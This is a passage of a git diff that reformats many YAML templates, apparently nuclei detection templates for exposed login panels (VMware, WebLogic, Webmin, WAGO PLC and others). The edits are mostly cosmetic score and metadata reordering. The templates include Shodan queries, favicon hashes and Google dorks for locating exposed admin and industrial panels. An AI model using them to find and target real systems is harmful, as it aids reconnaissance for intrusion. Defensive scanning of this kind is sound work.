CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:876876147 tags: panel,virtua @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/virtual-ema-detect.yaml b/http/exposed-panels/virtual-ema-detect.yaml index dd2de727eb..f45e5723e6 100644 --- a/http/exposed-panels/virtual-ema-detect.yaml +++ b/http/exposed-panels/virtual-ema-detect.yaml @@ -7,11 +7,11 @@ info: description: Virtual EMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,ems metadata: max-request: 2 + tags: panel,ems http: - method: GET diff --git a/http/exposed-panels/vmware-carbon-black-edr.yaml b/http/exposed-panels/vmware-carbon-black-edr.yaml index c503c7447a..e62d202a81 100644 --- a/http/exposed-panels/vmware-carbon-black-edr.yaml +++ b/http/exposed-panels/vmware-carbon-black-edr.yaml @@ -7,11 +7,11 @@ info: description: VMware Carbon Black EDR panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"VMware Carbon Black EDR" tags: panel,vmware diff --git a/http/exposed-panels/vmware-cloud-availability.yaml b/http/exposed-panels/vmware-cloud-availability.yaml index ba6fc08036..588c4bc242 100644 --- a/http/exposed-panels/vmware-cloud-availability.yaml +++ b/http/exposed-panels/vmware-cloud-availability.yaml @@ -7,11 +7,11 @@ info: description: VMware Cloud Director Availability login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"VMware Cloud Director Availability" tags: panel,vmware diff --git a/http/exposed-panels/vmware-cloud-director.yaml b/http/exposed-panels/vmware-cloud-director.yaml index 13cc1a889a..6476e0ede3 100644 --- a/http/exposed-panels/vmware-cloud-director.yaml +++ b/http/exposed-panels/vmware-cloud-director.yaml @@ -7,11 +7,11 @@ info: description: VMware Cloud Director login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Welcome to VMware Cloud Director" tags: panel,vmware diff --git a/http/exposed-panels/vmware-ftp-server.yaml b/http/exposed-panels/vmware-ftp-server.yaml index 175eaf3303..5a543ccd2d 100644 --- a/http/exposed-panels/vmware-ftp-server.yaml +++ b/http/exposed-panels/vmware-ftp-server.yaml @@ -7,11 +7,11 @@ info: description: VMware FTP Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"VMWARE FTP SERVER" tags: panel,vmware,ftp diff --git a/http/exposed-panels/vmware-hcx-login.yaml b/http/exposed-panels/vmware-hcx-login.yaml index 6302e02370..221f6c0c82 100644 --- a/http/exposed-panels/vmware-hcx-login.yaml +++ b/http/exposed-panels/vmware-hcx-login.yaml @@ -7,11 +7,11 @@ info: description: VMware HCX login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"VMware HCX" tags: panel,vmware diff --git a/http/exposed-panels/vmware-horizon-daas.yaml b/http/exposed-panels/vmware-horizon-daas.yaml index 22cfe2f1b8..b4881388c2 100644 --- a/http/exposed-panels/vmware-horizon-daas.yaml +++ b/http/exposed-panels/vmware-horizon-daas.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Horizon DaaS" tags: panel,vmware diff --git a/http/exposed-panels/vmware-horizon-panel.yaml b/http/exposed-panels/vmware-horizon-panel.yaml index 3b5f6e9d43..8caded1a61 100644 --- a/http/exposed-panels/vmware-horizon-panel.yaml +++ b/http/exposed-panels/vmware-horizon-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6496 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: horizon,vmware,edb,panel metadata: max-request: 2 + tags: horizon,vmware,edb,panel http: - method: GET diff --git a/http/exposed-panels/vmware-nsx-login.yaml b/http/exposed-panels/vmware-nsx-login.yaml index f76c5ecf47..081e95b474 100644 --- a/http/exposed-panels/vmware-nsx-login.yaml +++ b/http/exposed-panels/vmware-nsx-login.yaml @@ -7,11 +7,11 @@ info: description: VMware NSX login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png" tags: panel,vmware diff --git a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml index 3e5b61ec40..76c3334256 100644 --- a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml +++ b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml @@ -7,11 +7,11 @@ info: description: VMware vCenter Converter panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"VMware vCenter Converter Standalone" tags: panel,vmware,vcenter diff --git a/http/exposed-panels/vmware-vcloud-director.yaml b/http/exposed-panels/vmware-vcloud-director.yaml index 33c5603430..9accef986d 100644 --- a/http/exposed-panels/vmware-vcloud-director.yaml +++ b/http/exposed-panels/vmware-vcloud-director.yaml @@ -7,11 +7,11 @@ info: description: VMware vCloud Director panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"VMware vCloud Director" tags: panel,vmware,vcloud diff --git a/http/exposed-panels/vodafone-voxui-panel.yaml b/http/exposed-panels/vodafone-voxui-panel.yaml index a52d9790bf..b80e1018d3 100644 --- a/http/exposed-panels/vodafone-voxui-panel.yaml +++ b/http/exposed-panels/vodafone-voxui-panel.yaml @@ -7,11 +7,11 @@ info: description: Vodafone Vox UI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Vodafone Vox UI" tags: panel,vodafone diff --git a/http/exposed-panels/voipmonitor-panel.yaml b/http/exposed-panels/voipmonitor-panel.yaml index ceb22a1700..f4d826ee15 100644 --- a/http/exposed-panels/voipmonitor-panel.yaml +++ b/http/exposed-panels/voipmonitor-panel.yaml @@ -7,7 +7,7 @@ info: description: VoIPmonitor login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/vrealize-loginsight-panel.yaml b/http/exposed-panels/vrealize-loginsight-panel.yaml index 07910d44ba..df2bcdaf68 100644 --- a/http/exposed-panels/vrealize-loginsight-panel.yaml +++ b/http/exposed-panels/vrealize-loginsight-panel.yaml @@ -7,11 +7,11 @@ info: description: Detect vRealize Log Insight login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"vRealize Log insight" tags: panel,vmware,vrealize diff --git a/http/exposed-panels/wago-plc-panel.yaml b/http/exposed-panels/wago-plc-panel.yaml index 778f34bab1..a2627d9d04 100644 --- a/http/exposed-panels/wago-plc-panel.yaml +++ b/http/exposed-panels/wago-plc-panel.yaml @@ -7,16 +7,17 @@ info: description: WAGO PLC panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,wago metadata: max-request: 1 + tags: panel,wago http: - method: GET path: - "{{BaseURL}}/plc/webvisu.htm" + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/wagtail-cms-detect.yaml b/http/exposed-panels/wagtail-cms-detect.yaml index 502c478ac8..3dcf828b9a 100644 --- a/http/exposed-panels/wagtail-cms-detect.yaml +++ b/http/exposed-panels/wagtail-cms-detect.yaml @@ -7,11 +7,11 @@ info: description: The Wagtail panel has been detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Wagtail - Sign in" tags: panel,wagtail @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/admin/login/?next=/admin/' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/wallix-accessmanager-panel.yaml b/http/exposed-panels/wallix-accessmanager-panel.yaml index 8f04726bd9..d41f8dfdc7 100644 --- a/http/exposed-panels/wallix-accessmanager-panel.yaml +++ b/http/exposed-panels/wallix-accessmanager-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.wallix.com/privileged-access-management/access-manager/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 3 + matchers-condition: or matchers: - type: dsl diff --git a/http/exposed-panels/wampserver-homepage.yaml b/http/exposed-panels/wampserver-homepage.yaml index c1cc580e21..dbaa453ff0 100644 --- a/http/exposed-panels/wampserver-homepage.yaml +++ b/http/exposed-panels/wampserver-homepage.yaml @@ -7,11 +7,11 @@ info: description: WampServer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"WAMPSERVER Homepage" tags: panel,wampserver diff --git a/http/exposed-panels/watcher-panel.yaml b/http/exposed-panels/watcher-panel.yaml index 5c6dff7676..c0290ccb69 100644 --- a/http/exposed-panels/watcher-panel.yaml +++ b/http/exposed-panels/watcher-panel.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"/vsaas/v2/static/" tags: panel,watcher,login diff --git a/http/exposed-panels/watchguard-panel.yaml b/http/exposed-panels/watchguard-panel.yaml index 6876291b8c..8222f9999b 100644 --- a/http/exposed-panels/watchguard-panel.yaml +++ b/http/exposed-panels/watchguard-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7008 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: watchguard,edb,panel metadata: max-request: 1 + tags: watchguard,edb,panel http: - method: GET diff --git a/http/exposed-panels/watershed-panel.yaml b/http/exposed-panels/watershed-panel.yaml index 2a66af5625..daeb1ea746 100644 --- a/http/exposed-panels/watershed-panel.yaml +++ b/http/exposed-panels/watershed-panel.yaml @@ -7,11 +7,11 @@ info: description: Watershed login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Watershed LRS" tags: panel,watershed diff --git a/http/exposed-panels/wazuh-panel.yaml b/http/exposed-panels/wazuh-panel.yaml index e95d6376cd..68622366b2 100644 --- a/http/exposed-panels/wazuh-panel.yaml +++ b/http/exposed-panels/wazuh-panel.yaml @@ -37,4 +37,4 @@ http: part: body group: 1 regex: - - '"version":"([0-9.]+)"' \ No newline at end of file + - '"version":"([0-9.]+)"' diff --git a/http/exposed-panels/wd-mycloud-panel.yaml b/http/exposed-panels/wd-mycloud-panel.yaml index 2e30d4421a..d1cc14cf76 100644 --- a/http/exposed-panels/wd-mycloud-panel.yaml +++ b/http/exposed-panels/wd-mycloud-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.zerodayinitiative.com/blog/2023/4/19/cve-2022-29844-a-classic-buffer-overflow-on-the-western-digital-my-cloud-pro-series-pr4100 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1074357885 tags: panel,login,mycloud,wd,detect diff --git a/http/exposed-panels/weatherlink.yaml b/http/exposed-panels/weatherlink.yaml index 9527b3553a..f81a0591dc 100644 --- a/http/exposed-panels/weatherlink.yaml +++ b/http/exposed-panels/weatherlink.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6007 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'WeatherLinkIP Configuration' + - type: status status: - 200 diff --git a/http/exposed-panels/weave-scope-dashboard.yaml b/http/exposed-panels/weave-scope-dashboard.yaml index afa2d08df9..9f3baae9b8 100644 --- a/http/exposed-panels/weave-scope-dashboard.yaml +++ b/http/exposed-panels/weave-scope-dashboard.yaml @@ -7,11 +7,11 @@ info: description: Weave Scope panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET diff --git a/http/exposed-panels/web-file-manager.yaml b/http/exposed-panels/web-file-manager.yaml index 0a25842130..84469b78de 100644 --- a/http/exposed-panels/web-file-manager.yaml +++ b/http/exposed-panels/web-file-manager.yaml @@ -7,11 +7,11 @@ info: description: Web File Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Web File Manager" tags: panel,filemanager diff --git a/http/exposed-panels/web-local-craft.yaml b/http/exposed-panels/web-local-craft.yaml index 543910b542..e684c3f9c6 100644 --- a/http/exposed-panels/web-local-craft.yaml +++ b/http/exposed-panels/web-local-craft.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6800 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'WEB Local Craft Terminal' + - type: status status: - 200 diff --git a/http/exposed-panels/web-service-panel.yaml b/http/exposed-panels/web-service-panel.yaml index 57ff325c6e..733bf2efd7 100644 --- a/http/exposed-panels/web-service-panel.yaml +++ b/http/exposed-panels/web-service-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7116 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,panel,service metadata: max-request: 1 + tags: edb,panel,service http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'WEB SERVICE' + - type: status status: - 200 diff --git a/http/exposed-panels/web-viewer-panel.yaml b/http/exposed-panels/web-viewer-panel.yaml index d9dff05b46..6f1d3df138 100644 --- a/http/exposed-panels/web-viewer-panel.yaml +++ b/http/exposed-panels/web-viewer-panel.yaml @@ -5,8 +5,8 @@ info: author: JustaAcat severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Web Viewer for Samsung DVR" tags: panel,web-viewer,detect @@ -23,4 +23,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/webcomco-panel.yaml b/http/exposed-panels/webcomco-panel.yaml index bb4a7a55f0..e1fc5b2be9 100644 --- a/http/exposed-panels/webcomco-panel.yaml +++ b/http/exposed-panels/webcomco-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=626548889515634&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"WebcomCo" tags: panel,webcomco,login @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -28,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/webeditors-check-detect.yaml b/http/exposed-panels/webeditors-check-detect.yaml index 222a96ddb8..5c33598a27 100644 --- a/http/exposed-panels/webeditors-check-detect.yaml +++ b/http/exposed-panels/webeditors-check-detect.yaml @@ -7,11 +7,11 @@ info: description: Multiple web editor checks were detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,webeditors metadata: max-request: 17 + tags: panel,webeditors http: - method: GET diff --git a/http/exposed-panels/weblogic-login.yaml b/http/exposed-panels/weblogic-login.yaml index dbdd0a4874..f74274c7df 100644 --- a/http/exposed-panels/weblogic-login.yaml +++ b/http/exposed-panels/weblogic-login.yaml @@ -7,7 +7,7 @@ info: description: Oracle WebLogic login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/weblogic-uddiexplorer.yaml b/http/exposed-panels/weblogic-uddiexplorer.yaml index 75eb4190b1..0523459d8f 100644 --- a/http/exposed-panels/weblogic-uddiexplorer.yaml +++ b/http/exposed-panels/weblogic-uddiexplorer.yaml @@ -10,11 +10,11 @@ info: - https://www.tenable.com/plugins/was/112421 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,oracle,weblogic,tenable metadata: max-request: 1 + tags: panel,oracle,weblogic,tenable http: - method: GET diff --git a/http/exposed-panels/webmin-panel.yaml b/http/exposed-panels/webmin-panel.yaml index ccba0e85ae..5383f62626 100644 --- a/http/exposed-panels/webmin-panel.yaml +++ b/http/exposed-panels/webmin-panel.yaml @@ -7,17 +7,18 @@ info: description: Webmin admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,webmin metadata: max-request: 2 + tags: panel,webmin http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/webmin/" + host-redirects: true matchers: - type: word diff --git a/http/exposed-panels/webmodule-ee-panel.yaml b/http/exposed-panels/webmodule-ee-panel.yaml index 7a36558c72..124b923588 100644 --- a/http/exposed-panels/webmodule-ee-panel.yaml +++ b/http/exposed-panels/webmodule-ee-panel.yaml @@ -9,12 +9,12 @@ info: - https://www.exploit-db.com/ghdb/7001 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 - google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" shodan-query: title:"Webmodule" + google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" tags: edb,panel,webmodule-ee,login http: diff --git a/http/exposed-panels/webpagetest-panel.yaml b/http/exposed-panels/webpagetest-panel.yaml index 52cf11ba97..4768292bfd 100644 --- a/http/exposed-panels/webpagetest-panel.yaml +++ b/http/exposed-panels/webpagetest-panel.yaml @@ -7,7 +7,7 @@ info: description: WebPageTest login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/webroot-login.yaml b/http/exposed-panels/webroot-login.yaml index 771d09949c..1fa57212f7 100644 --- a/http/exposed-panels/webroot-login.yaml +++ b/http/exposed-panels/webroot-login.yaml @@ -7,11 +7,11 @@ info: description: Webroot login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Webroot - Login" tags: panel,webroot diff --git a/http/exposed-panels/webshell4-login-panel.yaml b/http/exposed-panels/webshell4-login-panel.yaml index 873ab7e781..ee6b11ba9d 100644 --- a/http/exposed-panels/webshell4-login-panel.yaml +++ b/http/exposed-panels/webshell4-login-panel.yaml @@ -7,11 +7,11 @@ info: description: WebShell4 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"webshell4" tags: webshell4,panel @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "/webshell4/index2.php" diff --git a/http/exposed-panels/webuzo-admin-panel.yaml b/http/exposed-panels/webuzo-admin-panel.yaml index b8c87e74b9..ac6a62c301 100644 --- a/http/exposed-panels/webuzo-admin-panel.yaml +++ b/http/exposed-panels/webuzo-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: Webuzo admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Webuzo - Admin Panel" tags: panel,webuzo,admin @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/weiphp-panel.yaml b/http/exposed-panels/weiphp-panel.yaml index bc39d279db..d00bfb4df8 100644 --- a/http/exposed-panels/weiphp-panel.yaml +++ b/http/exposed-panels/weiphp-panel.yaml @@ -7,11 +7,11 @@ info: description: Weiphp panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"weiphp" tags: panel,weiphp @@ -22,9 +22,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/whm-login-detect.yaml b/http/exposed-panels/whm-login-detect.yaml index 720c9e79a7..e7689ebf2e 100644 --- a/http/exposed-panels/whm-login-detect.yaml +++ b/http/exposed-panels/whm-login-detect.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7128 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,whm,panel,login metadata: max-request: 1 + tags: edb,whm,panel,login http: - method: GET diff --git a/http/exposed-panels/wiren-board-webui.yaml b/http/exposed-panels/wiren-board-webui.yaml index abcd8620da..6847a54665 100644 --- a/http/exposed-panels/wiren-board-webui.yaml +++ b/http/exposed-panels/wiren-board-webui.yaml @@ -10,8 +10,8 @@ info: cvss-score: 6.5 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Wiren Board Web UI" tags: panel,exposure,wiren diff --git a/http/exposed-panels/wmw-enterprise-panel.yaml b/http/exposed-panels/wmw-enterprise-panel.yaml index e5ef4a739a..a85a7f6811 100644 --- a/http/exposed-panels/wmw-enterprise-panel.yaml +++ b/http/exposed-panels/wmw-enterprise-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.wmw-hub.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,wmw,detect http: diff --git a/http/exposed-panels/wordpress-login.yaml b/http/exposed-panels/wordpress-login.yaml index e25860ea46..0117f49606 100644 --- a/http/exposed-panels/wordpress-login.yaml +++ b/http/exposed-panels/wordpress-login.yaml @@ -7,11 +7,11 @@ info: description: WordPress login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,wordpress metadata: max-request: 1 + tags: panel,wordpress http: - method: GET diff --git a/http/exposed-panels/workresources-rdp.yaml b/http/exposed-panels/workresources-rdp.yaml index 871bb30ab5..07d100d113 100644 --- a/http/exposed-panels/workresources-rdp.yaml +++ b/http/exposed-panels/workresources-rdp.yaml @@ -7,7 +7,7 @@ info: description: RDWeb RemoteApp and Desktop Connections does not display. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/workspace-one-uem.yaml b/http/exposed-panels/workspace-one-uem.yaml index f4018ef141..d4fbf53ec9 100644 --- a/http/exposed-panels/workspace-one-uem.yaml +++ b/http/exposed-panels/workspace-one-uem.yaml @@ -9,11 +9,11 @@ info: - https://twitter.com/Jhaddix/status/1295861505963909120 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Airwatch" tags: panel,workspaceone,vmware diff --git a/http/exposed-panels/wowza-streaming-engine.yaml b/http/exposed-panels/wowza-streaming-engine.yaml index ead86b4a43..ab22d45531 100644 --- a/http/exposed-panels/wowza-streaming-engine.yaml +++ b/http/exposed-panels/wowza-streaming-engine.yaml @@ -20,6 +20,7 @@ http: - type: word words: - 'Wowza Streaming Engine Manager' + - type: status status: - 200 diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml index a4e47bd9ff..1a7198ffcc 100644 --- a/http/exposed-panels/ws_ftp-server-web-transfer.yaml +++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml @@ -7,11 +7,11 @@ info: description: WS_FTP Server Web Transfer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 vendor: progress product: ws_ftp shodan-query: http.title:"WS_FTP Server Web Transfer" @@ -30,4 +30,4 @@ http: dsl: - contains(body, 'Web Transfer Client') - status_code == 200 - condition: and \ No newline at end of file + condition: and diff --git a/http/exposed-panels/wso2-management-console.yaml b/http/exposed-panels/wso2-management-console.yaml index 115b55e44a..d37a66769c 100644 --- a/http/exposed-panels/wso2-management-console.yaml +++ b/http/exposed-panels/wso2-management-console.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/5691 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/xds-amr-status.yaml b/http/exposed-panels/xds-amr-status.yaml index 5b9e1636d5..ecef8edf0b 100644 --- a/http/exposed-panels/xds-amr-status.yaml +++ b/http/exposed-panels/xds-amr-status.yaml @@ -7,7 +7,7 @@ info: description: XDS-AMR Status login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/xeams-admin-console.yaml 